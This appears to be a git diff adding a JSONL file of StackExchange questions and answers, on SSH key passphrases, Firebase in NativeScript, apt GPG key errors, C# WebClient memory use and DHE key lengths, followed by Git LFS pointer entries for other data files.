accidentally let someone have a copy of the private key file, he won't actually have the private key without guessing the pass phrase\".\nComment: Only the last sentence answers (half of) the question.\nComment: While it is true d is large and e small, both privatekey formats _used by OpenSSH_ for RSA include all the 'CRT' parameters (p, q, dp, dq, qinv) as shown in the answer now linked on the Q (and wikipedia) which makes it **over 4 times** the size of the publickey.\n","meta":{"source":"crypto.stackexchange","title":"What purpose does an SSH private key passphrase serve?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to initiazlize firebase puse notifications in NativeScript Angular app\n\nQuestion: I am creating an app with nativescript + Angular + Firebase push notifications using this plugin: nativescript-plugin-firebase.\nAccording to their documentation firebase.init should be called OnInit but then after app is reloaded in development i got an error that \"Token is already intialized\"\nQuestion is how to check if token is already intialized.\nI can check by using this code but it is kind of hacky:\n<code>const initializedToken = await messaging.getCurrentPushToken();\n\nif (initializedToken) {\n return;\n}\n<\/code>\nAlso i wonder if developemnt app restart = app reopen on real device?\nThanks\nAnswer: I haven't used Nativescript but with my Angular knowledge, I can tell you that Place your <code>firebase.init()<\/code> method in the <code>app.component.ts<\/code> file because it is the first component and is always eagerly loaded once the app starts. and then you can use firebase's methods to verify of its initialized or not.\nComment: Thats exactly where i am adding this. But on each change app gets reloaded and i get error saying that firebase was already initialized.\nComment: what kind of change\nComment: on any file save change when app is rebuilt\n","meta":{"source":"stackoverflow","title":"How to initiazlize firebase puse notifications in NativeScript Angular app","dup_signals":{}},"subset":"stackexchange"} +{"text":"I am trying to install docker. Whenever i run sudo apt-get update, i get this error:\n\nQuestion: <code>Hit:1 http:\/\/packages.microsoft.com\/repos\/vscode stable InRelease \nGet:2 http:\/\/repository.spotify.com stable InRelease [3,316 B] \nHit:3 https:\/\/download.docker.com\/linux\/debian stretch InRelease\nIgn:2 http:\/\/repository.spotify.com stable InRelease\nHit:4 https:\/\/deb.opera.com\/opera-stable stable InRelease\nHit:5 https:\/\/packagecloud.io\/AtomEditor\/atom\/any any InRelease\nFetched 3,316 B in 4s (774 B\/s)\n\nReading package lists... Done\n\nW: GPG error: http:\/\/repository.spotify.com stable InRelease: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY 4773BD5E130D1D45\nW: The repository 'http:\/\/repository.spotify.com stable InRelease' is not signed.\nN: Data from such a repository can't be authenticated and is therefore potentially dangerous to use.\nN: See apt-secure(8) manpage for repository creation and user configuration details.\nW: Target Packages (stable\/binary-amd64\/Packages) is configured multiple times in \/etc\/apt\/sources.list.d\/docker-ce.list:1 and \/etc\/apt\/sources.list.d\/docker.list:1\nW: Target Packages (stable\/binary-all\/Packages) is configured multiple times in \/etc\/apt\/sources.list.d\/docker-ce.list:1 and \/etc\/apt\/sources.list.d\/docker.list:1\nW: Target Packages (stable\/binary-amd64\/Packages) is configured multiple times in \/etc\/apt\/sources.list.d\/docker-ce.list:1 and \/etc\/apt\/sources.list.d\/docker.list:1\nW: Target Packages (stable\/binary-all\/Packages) is configured multiple times in \/etc\/apt\/sources.list.d\/docker-ce.list:1 and \/etc\/apt\/sources.list.d\/docker.list:1\n<\/code>\nComment: This has nothing to do with programming or docker. Please try something like https:\/\/askubuntu.com , [unix.se] or [su].\nAnswer: As far as I can see, the error is unrelated to Docker! Nevertheless, to still help you around this issue: You need to add the Spotify repository GPG key to yor apt keys. You may do so by issuing the following command in a shell:\n<code>sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 4773BD5E130D1D45\n<\/code>\nYou can find this information in the Debian Wiki. Please note that on the Spotify forums, someone reported that he needed to add another key to make it work:\n<code>sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys A87FF9DF48BF1C90\n<\/code>\nI did not test any of them personally (using Arch linux), but I used Ubuntu some years ago, and am familiar with this kind of issue.\nPS: If you try which one actually worked for you, let me know so that I can update the answer. Thanks!\nComment: The second GPG key worked correctly.\nComment: still getting these warnings:\n\nW: Target Packages (stable\/binary-amd64\/Packages) is configured multiple times in \/etc\/apt\/sources.list.d\/docker-ce.list:1 and \/etc\/apt\/sources.list.d\/docker.list:1\n\nW: Target Packages (stable\/binary-all\/Packages) is configured multiple times in \/etc\/apt\/sources.list.d\/docker-ce.list:1 and \/etc\/apt\/sources.list.d\/docker.list:1\nComment: yes, this is yet another issue. it seems you configured the docker packages twice, once in \/etc\/apt\/sources.list.d\/docker-ce.list as well as \/etc\/apt\/sources.list.d\/docker.list. remove one of them, leave whichever you prefer.\nComment: Thank you so much. My issue is solved now.\n","meta":{"source":"stackoverflow","title":"I am trying to install docker. Whenever i run sudo apt-get update, i get this error:","dup_signals":{}},"subset":"stackexchange"} +{"text":"C# WebClient - Large increase of LOH after downloading files\n\nQuestion: I have a class responsible for downloading files in a download manager. This class is responsible for downloading the file and writing it to the given path.\nThe size of the files to download varies normally from 1 to 5 MB but could also be much larger. I'm using an instance of the WebClient class to get the file from the internet.\n<code>public class DownloadItem\n{\n #region Events\n public delegate void DownloadItemDownloadCompletedEventHandler(object sender, DownloadCompletedEventArgs args);\n\n public event DownloadItemDownloadCompletedEventHandler DownloadItemDownloadCompleted;\n\n protected virtual void OnDownloadItemDownloadCompleted(DownloadCompletedEventArgs e)\n {\n DownloadItemDownloadCompleted?.Invoke(this, e);\n }\n\n public delegate void DownloadItemDownloadProgressChangedEventHandler(object sender, DownloadProgressChangedEventArgs args);\n\n public event DownloadItemDownloadProgressChangedEventHandler DownloadItemDownloadProgressChanged;\n\n protected virtual void OnDownloadItemDownloadProgressChanged(DownloadProgressChangedEventArgs e)\n {\n DownloadItemDownloadProgressChanged?.Invoke(this, e);\n }\n #endregion\n\n #region Fields\n private static readonly Logger Logger = LogManager.GetCurrentClassLogger();\n private WebClient _client;\n #endregion\n\n #region Properties\n public PlaylistItem Item { get; }\n public string SavePath { get; }\n public bool Overwrite { get; }\n #endregion\n\n public DownloadItem(PlaylistItem item, string savePath, bool overwrite = false)\n {\n Item = item;\n SavePath = savePath;\n Overwrite = overwrite;\n }\n\n public void StartDownload()\n {\n if (File.Exists(SavePath) && !Overwrite)\n {\n OnDownloadItemDownloadCompleted(new DownloadCompletedEventArgs(true));\n return;\n }\n\n OnDownloadItemDownloadProgressChanged(new DownloadProgressChangedEventArgs(1));\n Item.RetreiveDownloadUrl();\n\n if (string.IsNullOrEmpty(Item.DownloadUrl))\n {\n OnDownloadItemDownloadCompleted(new DownloadCompletedEventArgs(true, new InvalidOperationException(\"Could not retreive download url\")));\n return;\n }\n\n \/\/ GCSettings.LargeObjectHeapCompactionMode = GCLargeObjectHeapCompactionMode.CompactOnce;\n using (_client = new WebClient())\n {\n _client.Headers.Add(\"user-agent\", \"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;)\");\n\n try\n {\n _client.DownloadDataCompleted +=\n (sender, args) =>\n {\n Task.Run(() =>\n {\n DownloadCompleted(args);\n });\n };\n _client.DownloadProgressChanged += (sender, args) => OnDownloadItemDownloadProgressChanged(new DownloadProgressChangedEventArgs(args.ProgressPercentage));\n _client.DownloadDataAsync(new Uri(Item.DownloadUrl));\n }\n catch (Exception ex)\n {\n Logger.Warn(ex, \"Error downloading track {0}\", Item.VideoId);\n OnDownloadItemDownloadCompleted(new DownloadCompletedEventArgs(true, ex));\n }\n }\n }\n\n private void DownloadCompleted(DownloadDataCompletedEventArgs args)\n {\n \/\/ _client = null;\n\n \/\/ GCSettings.LargeObjectHeapCompactionMode = GCLargeObjectHeapCompactionMode.CompactOnce;\n \/\/ GC.Collect(2, GCCollectionMode.Forced);\n\n if (args.Cancelled)\n {\n OnDownloadItemDownloadCompleted(new DownloadCompletedEventArgs(true, args.Error));\n return;\n }\n\n try\n {\n File.WriteAllBytes(SavePath, args.Result);\n\n using (var file = TagLib.File.Create(SavePath))\n {\n file.Save();\n }\n\n try\n {\n MusicFormatConverter.M4AToMp3(SavePath);\n }\n catch (Exception)\n {\n \/\/ ignored\n }\n\n OnDownloadItemDownloadCompleted(new DownloadCompletedEventArgs(false));\n }\n catch (Exception ex)\n {\n OnDownloadItemDownloadCompleted(new DownloadCompletedEventArgs(true, ex));\n Logger.Error(ex, \"Error writing track file for track {0}\", Item.VideoId);\n }\n }\n\n public void StopDownload()\n {\n _client?.CancelAsync();\n }\n\n public override int GetHashCode()\n {\n return Item.GetHashCode();\n }\n\n public override bool Equals(object obj)\n {\n var item = obj as DownloadItem;\n\n return Item.Equals(item?.Item);\n }\n}\n<\/code>\nEvery download causes a very large memory increase compared with the file size of the downloaded item. If I download a file with a size of ~3 MB the memory usage is increasing about 8 MB.\n\nAs you can see the download is producing much LOH which is not cleared after the download. Even forcing the GC or the setting <code>GCSettings.LargeObjectHeapCompactionMode = GCLargeObjectHeapCompactionMode.CompactOnce;<\/code> is not helping to prevent this memory leak.\n\nComparing Snapshot 1 and 2 you can see that the amount of memory is produced by byte arrays which might be the download result.\n\nDoing several downloads shows how terrible this memory leak is.\nIn my opinion this is caused by the WebClient instance in any way. However I can't really determine what exactly is causing this issue.\nIt doesn't even matters if I force the GC. This screen here shows it without forced gc:\n\nWhat is causing this overheat and how can I fix it? This is a major bug and imagining 100 or more downloads the process would run out of memory. \nEdit\n\nAs suggested I commented out the section responsible for setting the tags and converting the M4A to an MP3. However the converter is just a call of FFMPEG so it shouldn't be a memory leak:\n<code>class MusicFormatConverter\n{\n public static void M4AToMp3(string filePath, bool deleteOriginal = true)\n {\n if(string.IsNullOrEmpty(filePath) || !filePath.EndsWith(\".m4a\"))\n throw new ArgumentException(nameof(filePath));\n\n var toolPath = Path.Combine(\"tools\", \"ffmpeg.exe\");\n\n var convertedFilePath = filePath.Replace(\".m4a\", \".mp3\");\n File.Delete(convertedFilePath);\n\n var process = new Process\n {\n StartInfo =\n {\n FileName = toolPath,\n#if !DEBUG\n WindowStyle = ProcessWindowStyle.Hidden,\n#endif\n Arguments = $\"-i \\\"{filePath}\\\" -acodec libmp3lame -ab 128k \\\"{convertedFilePath}\\\"\"\n }\n };\n\n process.Start();\n process.WaitForExit();\n\n if(!File.Exists(convertedFilePath))\n throw new InvalidOperationException(\"File was not converted successfully!\");\n\n if(deleteOriginal)\n File.Delete(filePath);\n }\n}\n<\/code>\nThe <code>DownloadCompleted()<\/code> method looks now like this:\n<code>private void DownloadCompleted(DownloadDataCompletedEventArgs args)\n{\n \/\/ _client = null;\n\n \/\/ GCSettings.LargeObjectHeapCompactionMode = GCLargeObjectHeapCompactionMode.CompactOnce;\n \/\/ GC.Collect(2, GCCollectionMode.Forced);\n\n if (args.Cancelled)\n {\n OnDownloadItemDownloadCompleted(new DownloadCompletedEventArgs(true, args.Error));\n return;\n }\n\n try\n {\n File.WriteAllBytes(SavePath, args.Result);\n\n \/*\n using (var file = TagLib.File.Create(SavePath))\n {\n file.Save();\n }\n\n try\n {\n MusicFormatConverter.M4AToMp3(SavePath);\n }\n catch (Exception)\n {\n \/\/ ignore\n }\n *\/\n\n OnDownloadItemDownloadCompleted(new DownloadCompletedEventArgs(false));\n }\n catch (Exception ex)\n {\n OnDownloadItemDownloadCompleted(new DownloadCompletedEventArgs(true, ex));\n Logger.Error(ex, \"Error writing track file for track {0}\", Item.VideoId);\n }\n}\n<\/code>\nThe result after downloading 7 items:\n\nIt seems like this was not the memory leak.\nAs an addition I'm submitting the <code>DownloadManager<\/code> class too as it is handling the whole download operation. Maybe this could be the source of the problem.\n<code>public class DownloadManager\n{\n #region Fields\n private static readonly Logger Logger = LogManager.GetCurrentClassLogger();\n private readonly Queue<DownloadItem> _queue;\n private readonly List<DownloadItem> _activeDownloads;\n private bool _active;\n private Thread _thread;\n #endregion\n\n #region Construction\n public DownloadManager()\n {\n _queue = new Queue<DownloadItem>();\n _activeDownloads = new List<DownloadItem>();\n }\n #endregion\n\n #region Methods\n public void AddToQueue(DownloadItem item)\n {\n _queue.Enqueue(item);\n\n StartManager();\n }\n\n public void Abort()\n {\n _thread?.Abort();\n\n _queue.Clear();\n _activeDownloads.Clear();\n }\n\n private void StartManager()\n {\n if(_active) return;\n\n _active = true;\n\n _thread = new Thread(() =>\n {\n try\n {\n while (_queue.Count > 0 && _queue.Peek() != null)\n {\n DownloadItem();\n\n while (_activeDownloads.Count >= Properties.Settings.Default.ParallelDownloads)\n {\n Thread.Sleep(10);\n }\n }\n\n _active = false;\n }\n catch (ThreadInterruptedException)\n {\n \/\/ ignored\n }\n });\n _thread.Start();\n }\n\n private void DownloadItem()\n {\n if (_activeDownloads.Count >= Properties.Settings.Default.ParallelDownloads) return;\n\n DownloadItem item;\n try\n {\n item = _queue.Dequeue();\n }\n catch\n {\n return;\n }\n\n if (item != null)\n {\n item.DownloadItemDownloadCompleted += (sender, args) =>\n {\n if(args.Error != null)\n Logger.Error(args.Error, \"Error downloading track {0}\", ((DownloadItem)sender).Item.VideoId);\n\n _activeDownloads.Remove((DownloadItem) sender);\n };\n\n _activeDownloads.Add(item);\n Task.Run(() => item.StartDownload());\n }\n }\n #endregion\n<\/code>\nComment: What is your .NET version? From your code, it says: NET CLR 1.0.3705\nComment: I'm using .NET Framework 4.5.2\nComment: WebClient does not have a leak. Clearly you ought to be much more concerned about \"Taglib\" and \"MusicFormatConverter\", classes that so unlike WebClient are *not* tested millions of times every day. Use a decent memory profiler to get ahead.\nComment: I edited my post and tried it without the Taglib and MusicFormatConverter part. The result is still the same.\nComment: I fear that the WebClient is not disposed properly. That would explain the high overheat. Maybe there is an explanation for this but I have no clue atm.\nComment: I believe it's by design. WebClient behaves like this when using the DownloadData and DownloadString methods. Behind the scene it uses a buffer backed by byte arrays that can double its size each time it thinks its needed: https:\/\/referencesource.microsoft.com\/#System\/net\/System\/Net\/_ScatterGatherBuffers.cs,2e60233bb771e7a1,references . There are two solutions: you can use DownloadFile instead wich uses a Stream internally, which is the easiest way, and in the end, that's what you do, or use the OpenRead methods and stream things by yourself and avoid huge byte[] allocations.\nComment: @SimonMourier Yesterday I tried the DownloadFileAsync method but it end up in the same situation like the DownloadDataAsync method. It still produces a large overheat compared to the downloaded size. I think I am forced to use the second method you described.\nComment: @chris579: We can't see your images in the question.\nComment: @CharithJ Strange, I can see them. However this issue was already fixed.\nComment: @HansPassant WebClient has a leak when used asynchronously. See this question: https:\/\/stackoverflow.com\/questions\/53350298\/large-unexplained-memory-in-the-memory-dump-of-a-net-process 2OP: thanks for your question and workaround!!!\nAnswer: Finally, after dozens of profilings and memory checking the issue is resolved now.\nAs @SimonMourier already stated this issue is related to the design of the <code>UploadFile<\/code>, <code>DownloadData<\/code>, <code>DownloadString<\/code> and <code>DownloadFile<\/code> methods. Looking into the backend of them you can see that all of them are using the private <code>DownloadBits<\/code> method in the <code>WebClient<\/code> class with this signature:\n<code>private byte[] DownloadBits(WebRequest request, Stream writeStream, CompletionDelegate completionDelegate, AsyncOperation asyncOp)\n<\/code>\nRegarding the return type it is clear why the behaviour is like I discovered:\nWhen using the above mentioned methods the content is saved in a byte array. Therefore it is not recommended to use these methods if the file size is > 85,000 bytes as this would result in filling the LOH until the memory limit is reached. This might not be important if the files are small but with growing size the LOH is also growing by a multiple.\nAs an addition here my final solution:\n<code>public class DownloadItem : DownloadManagerItem\n{\n #region Fields\n\n private static readonly Logger Logger = LogManager.GetCurrentClassLogger();\n\n private WebClient _webClient;\n\n #endregion\n\n #region Properties\n\n public string SavePath { get; }\n public bool Overwrite { get; }\n public DownloadFormat DownloadFormat { get; }\n\n #endregion\n\n public DownloadItem(PlaylistItem item, string savePath, DownloadFormat downloadFormat, bool overwrite = false)\n : base(item)\n {\n SavePath = savePath;\n Overwrite = overwrite;\n DownloadFormat = downloadFormat;\n }\n\n public override void StartDownload()\n {\n if (File.Exists(SavePath) && !Overwrite)\n {\n OnDownloadItemDownloadCompleted(new DownloadCompletedEventArgs(true));\n return;\n }\n\n OnDownloadItemDownloadProgressChanged(new DownloadProgressChangedEventArgs(1));\n Item.RetreiveDownloadUrl();\n\n if (string.IsNullOrEmpty(Item.DownloadUrl))\n {\n OnDownloadItemDownloadCompleted(new DownloadCompletedEventArgs(true,\n new InvalidOperationException(\"Could not retreive download url\")));\n return;\n }\n\n using (_webClient = new WebClient())\n {\n _webClient.Headers.Add(\"user-agent\",\n \"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;)\");\n\n try\n {\n _webClient.OpenReadCompleted += WebClientOnOpenReadCompleted;\n\n _webClient.OpenReadAsync(new Uri(Item.DownloadUrl));\n }\n catch (Exception ex)\n {\n Logger.Warn(ex, \"Error downloading track {0}\", Item.VideoId);\n OnDownloadItemDownloadCompleted(new DownloadCompletedEventArgs(true, ex));\n }\n }\n }\n\n private void WebClientOnOpenReadCompleted(object sender, OpenReadCompletedEventArgs openReadCompletedEventArgs)\n {\n _webClient.Dispose();\n\n if (openReadCompletedEventArgs.Cancelled)\n {\n OnDownloadItemDownloadCompleted(new DownloadCompletedEventArgs(true, openReadCompletedEventArgs.Error));\n return;\n }\n\n if (!Overwrite && File.Exists(SavePath))\n return;\n\n var totalLength = 0;\n try\n {\n totalLength = int.Parse(((WebClient)sender).ResponseHeaders[\"Content-Length\"]);\n }\n catch (Exception)\n {\n \/\/ ignored\n }\n\n try\n {\n long processed = 0;\n var tmpPath = Path.GetTempFileName();\n\n using (var stream = openReadCompletedEventArgs.Result)\n using (var fs = File.Create(tmpPath))\n {\n var buffer = new byte[16 * 1024];\n int read;\n\n while ((read = stream.Read(buffer, 0, buffer.Length)) > 0)\n {\n fs.Write(buffer, 0, read);\n\n processed += read;\n OnDownloadItemDownloadProgressChanged(new DownloadProgressChangedEventArgs(processed, totalLength));\n }\n }\n\n File.Move(tmpPath, SavePath);\n\n OnDownloadItemDownloadCompleted(new DownloadCompletedEventArgs(false));\n }\n catch (Exception ex)\n {\n OnDownloadItemDownloadCompleted(new DownloadCompletedEventArgs(true, ex));\n }\n }\n\n public override void StopDownload()\n {\n _webClient?.CancelAsync();\n }\n\n public override void Dispose()\n {\n _webClient?.Dispose();\n }\n\n public override int GetHashCode()\n {\n return Item.GetHashCode();\n }\n\n public override bool Equals(object obj)\n {\n var item = obj as DownloadItem;\n\n return Item.Equals(item?.Item);\n }\n}\n<\/code>\nHowever thanks for the help!\nComment: @Maddin that would be quite pointless since you then would have two buffers that need to be allocated. The returning stream already contains a buffer and a buffered stream contains one as well. Don't bother what implementation of `Stream` you are working with, it's only important that you work with streams rather than big byte arrays. And you really should use `HttpClient` instead of `WebClient`.\nComment: Could it also be a solution to use the .Net `BufferedStream` class ([MS docs](https:\/\/learn.microsoft.com\/en-us\/dotnet\/api\/system.io.bufferedstream?view=net-7.0)) for reading in chunks to bypass the LOH?\nComment: @Maddin using any Stream is fine since they have an underlying buffer that fits into the memory size constraints anyways. However, if you acquire a stream from an `HttpClient` you cannot control what `Stream` implementation you get anyways.\nComment: Thanks for clarification. Shouldn't it be possible to create a `BufferedStream` from the `Stream` return by `WebClient.OpenReadAsync`? The ctor takes a stream.\n","meta":{"source":"stackoverflow","title":"C# WebClient - Large increase of LOH after downloading files","dup_signals":{}},"subset":"stackexchange"} +{"text":"DHE key exchange with p value 257 bytes but a pubkey of 256 bytes\n\nQuestion: I came across a packet capture in Wireshark where p length = 257 bytes and pubkey length = 256 bytes. See the ServerKeyExchange snip below:\n<code>Diffie-Hellman Server Params\n p Length: 257\n p: 00a81c7b6633732007ba19bf733fc5f6cf5d0c9f8e03ec4c3caebbe392bb8830b5cb1144\u2026\n g Length: 1\n g: 05\n Pubkey Length: 256\n Pubkey: 8b55fc1f255a06c2619bc44a398df6feeefdc236ab376fbcfe3908b30c41b5d5aac4847a\u2026\n Signature Algorithm: rsa_pkcs1_sha256 (0x0401)\n Signature Length: 256\n Signature: 66b99953613dc8650a465e9b9cf8187e29df14fe5e758086772393fec9c41a4956703b4e\u2026\n<\/code>\nIn the ClientKeyExchange length of pubkey = 257 bytes as below:\n<code>Diffie-Hellman Client Params\n Pubkey Length: 257\n Pubkey: 0095bd9694bbfaf4d30520ce013cb6487a67c7e2d4735ecf58f4dab3b322893c256c539c\u2026\n\n<\/code>\nThe SSL handshake is successful. I'm curious to know how and why?\nAren't the length of pubkey in ServerKeyExchange and ClientKeyExchange supposed to be the same?\nAnswer: The length as such doesn't matter; the numeric value does. Both publickey values -- Ys and Yc -- must be numerically less than p (and greater than one), and both your examples are.\nThe numbers used in 'classic'\/modp\/Zp DHE, now retronymed finite-field DHE = FFDHE, are always positive, and are encoded in SSL\/TLS as unsigned, so leading zero bytes don't affect the value. The minimum size needed for either Y value is not greater than that needed for p, and most of the time it is equal, but about half a percent of the time (at random) it is actually smaller.\nHowever, the 'bignum' features or libraries used in SSL\/TLS implementations often handle signed as well, and may need a leading zero byte on numbers that would otherwise have the high bit set because that is used as the representation for a negative number, which we don't want here. It may not be worth the trouble of removing or avoiding that 'extra' byte.\nSSL\/TLS does not require minimum-length encoding of numbers so it would be legal, though silly, to add even more (redundant) leading zero bytes up to the encoding size limit of 65535 bytes. This might be a good place for more 'GREASE' if practically everybody weren't now using elliptic curves (ECDHE\/XDHE) instead of FFDHE.\nIn contrast both ASN.1 DER\/BER and SSH use signed (two's complement) minimum-length, so for them the 'extra' zero is sometimes required and sometimes prohibited, but the numeric values still follow the rule above. (PGP doesn't use FFDH, but for similar algos uses unsigned with the length implied from the exact number of significant bits, which is necessarily minimum-length.)\nComment: Neatly explained! Thanks for your answer.\n","meta":{"source":"security.stackexchange","title":"DHE key exchange with p value 257 bytes but a pubkey of 256 bytes","dup_signals":{}},"subset":"stackexchange"} diff --git a/data/stackexchange/1-1/228_2289.jsonl b/data/stackexchange/1-1/228_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..25a624b232fedd30712e0c050671ca564ac7c43e --- /dev/null +++ b/data/stackexchange/1-1/228_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9300f0f4fdc0a2d4a7baa4f3432de5f405d18fb00ff3473fcc13fe7dd6fe85a7 +size 37531964 diff --git a/data/stackexchange/1-1/229_2289.jsonl b/data/stackexchange/1-1/229_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4929e4ff300e8e588dd8a20c42f212b1c847b4db --- /dev/null +++ b/data/stackexchange/1-1/229_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b4a0af1fc8ba1701dfa9efe0470be195f082984a08a90257db1dab2f0042dcfd +size 37436856 diff --git a/data/stackexchange/1-1/22_2289.jsonl b/data/stackexchange/1-1/22_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c9eba07c81987f4ef23eae254cb529c4b493c8da --- /dev/null +++ b/data/stackexchange/1-1/22_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:521631bd8bc4e1a83085393183bf25e4cbf9fdeaed708af4a228fabc07a3ad8a +size 36309936 diff --git a/data/stackexchange/1-1/230_2289.jsonl b/data/stackexchange/1-1/230_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..73e70f1d854881fae6a712adaefdf64e118087bb --- /dev/null +++ b/data/stackexchange/1-1/230_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1384a5139a7ad81a73b0a62669d4b01aa1519335e379cd072b28b9ea51d7da91 +size 37727703 diff --git a/data/stackexchange/1-1/231_2289.jsonl b/data/stackexchange/1-1/231_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..391ac13ef761a9e9753a16f90219ab845544dee1 --- /dev/null +++ b/data/stackexchange/1-1/231_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ec01f7bd1864c72c06619a638b3ec888413f8447d45106996798fe7fc3c0e3bb +size 37256718 diff --git a/data/stackexchange/1-1/232_2289.jsonl b/data/stackexchange/1-1/232_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4ba882bcdfa78d883515f70e86f815ce4be7b622 --- /dev/null +++ b/data/stackexchange/1-1/232_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5812d899c88067074a35d02dabc55c7e637ac392cdb78e83a084971bc17a778b +size 36857337 diff --git a/data/stackexchange/1-1/233_2289.jsonl b/data/stackexchange/1-1/233_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e9d5bb1e073692c95ebe15a1c27dcba60c615fb9 --- /dev/null +++ b/data/stackexchange/1-1/233_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5d847945a49e63ecd9a0da45e2797c5d92ca69c0396a4ffdb9d51fe81aad76d7 +size 38251495 diff --git a/data/stackexchange/1-1/234_2289.jsonl b/data/stackexchange/1-1/234_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..de827f6160e6549e2d5c1ef1957701173bacf799 --- /dev/null +++ b/data/stackexchange/1-1/234_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:55de8e0ce934d3c012c2f2566a3797042d0f1ce3a0acb8c484f319dc5b7ebfc4 +size 37790219 diff --git a/data/stackexchange/1-1/235_2289.jsonl b/data/stackexchange/1-1/235_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e4bcff8f4f422da14b6103b88d7951b9ea402f43 --- /dev/null +++ b/data/stackexchange/1-1/235_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:05145438fdf90fc259de6261fd9f8c1d1ef49f89603c20e6e5dd5ee1854dbaa0 +size 37739491 diff --git a/data/stackexchange/1-1/236_2289.jsonl b/data/stackexchange/1-1/236_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f853f47934581aaa95495c9c0c0b4ef6fb81b9eb --- /dev/null +++ b/data/stackexchange/1-1/236_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3ca9abd67d6f98f0a82504ed9173df8a2f9163b0365c5920517991226abff182 +size 37276282 diff --git a/data/stackexchange/1-1/237_2289.jsonl b/data/stackexchange/1-1/237_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..280d3690df426d82e37a9642e01f48ffa84cd6f9 --- /dev/null +++ b/data/stackexchange/1-1/237_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7a914294e85607945ca0ad36d7c10cc40e0d1ca5842aad054021e515c75a7770 +size 37910091 diff --git a/data/stackexchange/1-1/238_2289.jsonl b/data/stackexchange/1-1/238_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0c1364c5843797e61629a9b3a0c31658ef45b594 --- /dev/null +++ b/data/stackexchange/1-1/238_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f3e8148deb28f2063827d055481208eaacb2ddf804920211bda3d82401f5ffe4 +size 38455257 diff --git a/data/stackexchange/1-1/239_2289.jsonl b/data/stackexchange/1-1/239_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9f006254de4b7e92172286e1da2db95090604bb3 --- /dev/null +++ b/data/stackexchange/1-1/239_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6f8c31988d28b70102ce4e7c422d7fa88dfeab70bf4cad0364ffeeb6e40aa0b8 +size 38069260 diff --git a/data/stackexchange/1-1/23_2289.jsonl b/data/stackexchange/1-1/23_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b64862325e2714812ceefa981704dc45b6a1c3fe --- /dev/null +++ b/data/stackexchange/1-1/23_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:25ac860223421a2f639e504cf11a4337f462a8bc0fac137c53027c0f9a015b28 +size 35947009 diff --git a/data/stackexchange/1-1/240_2289.jsonl b/data/stackexchange/1-1/240_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ce9b81c71174a8e612f1ad3ecf41914f40abc7b4 --- /dev/null +++ b/data/stackexchange/1-1/240_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fbf51e4a2d3c76d25cbb7d517f07b5db5dca4609f1275be446d69f83cc123d5d +size 37670426 diff --git a/data/stackexchange/1-1/241_2289.jsonl b/data/stackexchange/1-1/241_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b8896be5d00d6efdeb8b888c017cd65c71947bec --- /dev/null +++ b/data/stackexchange/1-1/241_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4210f73f5d33e167d0c54be31d4520f49d07381677c52e6d4b221ecc219420b8 +size 36631384 diff --git a/data/stackexchange/1-1/242_2289.jsonl b/data/stackexchange/1-1/242_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..61c0fe62b754deb1b28b496e7187d96f4a09a31e --- /dev/null +++ b/data/stackexchange/1-1/242_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:513734499b5b1ca69a30aead6edaa9d97f2219a17f5c329da6d456e68d602b0a +size 38908292 diff --git a/data/stackexchange/1-1/243_2289.jsonl b/data/stackexchange/1-1/243_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4bf0ccf8a27496ded48be11dad4be4fed5f0b8b2 --- /dev/null +++ b/data/stackexchange/1-1/243_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f4c0ffcebd9674fdf5d75534452fb8ea937e93b91a20c57ff4a9e3ba6539a2e1 +size 37316206 diff --git a/data/stackexchange/1-1/244_2289.jsonl b/data/stackexchange/1-1/244_2289.jsonl 